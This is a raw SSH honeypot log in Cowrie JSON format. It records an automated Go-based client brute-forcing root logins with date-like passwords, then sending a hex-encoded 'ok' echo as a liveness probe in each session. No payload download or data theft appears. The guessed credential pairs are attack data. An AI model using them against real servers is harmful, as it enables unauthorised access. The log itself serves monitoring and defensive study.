{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.536929Z","src_ip":"212.227.125.160","session":"3edb753f9c39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34476,"dst_ip":"1.2.3.4","dst_port":22,"session":"b13fdff14f0a","protocol":"ssh","message":"New connection: 212.227.125.160:34476 (1.2.3.4:22) [session: b13fdff14f0a]","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.594808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.653604Z","src_ip":"212.227.125.160","session":"b13fdff14f0a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.654295Z","src_ip":"212.227.125.160","session":"b13fdff14f0a"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"q1w2e3","message":"login attempt [oracle/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.726275Z","src_ip":"196.251.86.249","session":"97bffd7700fe"}
{"eventid":"cowrie.login.success","username":"root","password":"301088","message":"login attempt [root/301088] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.795874Z","src_ip":"212.227.125.160","session":"b13fdff14f0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:31.876271Z","src_ip":"212.227.125.160","session":"b13fdff14f0a"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.877064Z","src_ip":"212.227.125.160","session":"b13fdff14f0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.901030Z","src_ip":"212.227.125.160","session":"b13fdff14f0a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.902234Z","src_ip":"212.227.125.160","session":"b13fdff14f0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34482,"dst_ip":"1.2.3.4","dst_port":22,"session":"4add66938966","protocol":"ssh","message":"New connection: 212.227.125.160:34482 (1.2.3.4:22) [session: 4add66938966]","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.922844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.924350Z","src_ip":"212.227.125.160","session":"4add66938966"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:31.947180Z","src_ip":"212.227.125.160","session":"4add66938966"}
{"eventid":"cowrie.login.success","username":"root","password":"300782","message":"login attempt [root/300782] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.074140Z","src_ip":"212.227.125.160","session":"4add66938966"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:32.286223Z","src_ip":"212.227.125.160","session":"4add66938966"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.286933Z","src_ip":"212.227.125.160","session":"4add66938966"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.339345Z","src_ip":"212.227.125.160","session":"4add66938966"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.340394Z","src_ip":"212.227.125.160","session":"4add66938966"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34490,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef6413ec0d0b","protocol":"ssh","message":"New connection: 212.227.125.160:34490 (1.2.3.4:22) [session: ef6413ec0d0b]","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.368759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.408335Z","src_ip":"212.227.125.160","session":"ef6413ec0d0b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.475499Z","src_ip":"212.227.125.160","session":"ef6413ec0d0b"}
{"eventid":"cowrie.login.success","username":"root","password":"300690","message":"login attempt [root/300690] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.576603Z","src_ip":"212.227.125.160","session":"ef6413ec0d0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:32.706849Z","src_ip":"212.227.125.160","session":"ef6413ec0d0b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.707667Z","src_ip":"212.227.125.160","session":"ef6413ec0d0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.743217Z","src_ip":"212.227.125.160","session":"ef6413ec0d0b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.744428Z","src_ip":"212.227.125.160","session":"ef6413ec0d0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34506,"dst_ip":"1.2.3.4","dst_port":22,"session":"722dad61fd35","protocol":"ssh","message":"New connection: 212.227.125.160:34506 (1.2.3.4:22) [session: 722dad61fd35]","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.765260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.771172Z","src_ip":"212.227.125.160","session":"722dad61fd35"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.791128Z","src_ip":"212.227.125.160","session":"722dad61fd35"}
{"eventid":"cowrie.login.success","username":"root","password":"291285","message":"login attempt [root/291285] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.899825Z","src_ip":"212.227.125.160","session":"722dad61fd35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:32.964371Z","src_ip":"212.227.125.160","session":"722dad61fd35"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.965152Z","src_ip":"212.227.125.160","session":"722dad61fd35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.988917Z","src_ip":"212.227.125.160","session":"722dad61fd35"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:32.989941Z","src_ip":"212.227.125.160","session":"722dad61fd35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34514,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f3f07a1f416","protocol":"ssh","message":"New connection: 212.227.125.160:34514 (1.2.3.4:22) [session: 1f3f07a1f416]","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.010754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.013457Z","src_ip":"212.227.125.160","session":"1f3f07a1f416"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.039205Z","src_ip":"212.227.125.160","session":"1f3f07a1f416"}
{"eventid":"cowrie.login.success","username":"root","password":"291080","message":"login attempt [root/291080] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.181875Z","src_ip":"212.227.125.160","session":"1f3f07a1f416"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.209734Z","src_ip":"196.251.86.249","session":"97bffd7700fe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:33.301588Z","src_ip":"212.227.125.160","session":"1f3f07a1f416"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.302284Z","src_ip":"212.227.125.160","session":"1f3f07a1f416"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.325669Z","src_ip":"212.227.125.160","session":"1f3f07a1f416"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.326629Z","src_ip":"212.227.125.160","session":"1f3f07a1f416"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34522,"dst_ip":"1.2.3.4","dst_port":22,"session":"48f5ca486d1a","protocol":"ssh","message":"New connection: 212.227.125.160:34522 (1.2.3.4:22) [session: 48f5ca486d1a]","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.347421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.348256Z","src_ip":"212.227.125.160","session":"48f5ca486d1a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.385678Z","src_ip":"212.227.125.160","session":"48f5ca486d1a"}
{"eventid":"cowrie.login.success","username":"root","password":"2909","message":"login attempt [root/2909] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.485951Z","src_ip":"212.227.125.160","session":"48f5ca486d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:33.621121Z","src_ip":"212.227.125.160","session":"48f5ca486d1a"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.621649Z","src_ip":"212.227.125.160","session":"48f5ca486d1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.645629Z","src_ip":"212.227.125.160","session":"48f5ca486d1a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.646575Z","src_ip":"212.227.125.160","session":"48f5ca486d1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34524,"dst_ip":"1.2.3.4","dst_port":22,"session":"43284c9f0e87","protocol":"ssh","message":"New connection: 212.227.125.160:34524 (1.2.3.4:22) [session: 43284c9f0e87]","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.667327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.668122Z","src_ip":"212.227.125.160","session":"43284c9f0e87"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.710959Z","src_ip":"212.227.125.160","session":"43284c9f0e87"}
{"eventid":"cowrie.login.success","username":"root","password":"29","message":"login attempt [root/29] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.801100Z","src_ip":"212.227.125.160","session":"43284c9f0e87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:33.877810Z","src_ip":"212.227.125.160","session":"43284c9f0e87"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.878929Z","src_ip":"212.227.125.160","session":"43284c9f0e87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.907693Z","src_ip":"212.227.125.160","session":"43284c9f0e87"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.909039Z","src_ip":"212.227.125.160","session":"43284c9f0e87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34540,"dst_ip":"1.2.3.4","dst_port":22,"session":"d79ea593f793","protocol":"ssh","message":"New connection: 212.227.125.160:34540 (1.2.3.4:22) [session: d79ea593f793]","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.929266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.932675Z","src_ip":"212.227.125.160","session":"d79ea593f793"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:33.960325Z","src_ip":"212.227.125.160","session":"d79ea593f793"}
{"eventid":"cowrie.login.success","username":"root","password":"281289","message":"login attempt [root/281289] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:34.083273Z","src_ip":"212.227.125.160","session":"d79ea593f793"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:34.288824Z","src_ip":"212.227.125.160","session":"d79ea593f793"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:34.289666Z","src_ip":"212.227.125.160","session":"d79ea593f793"}
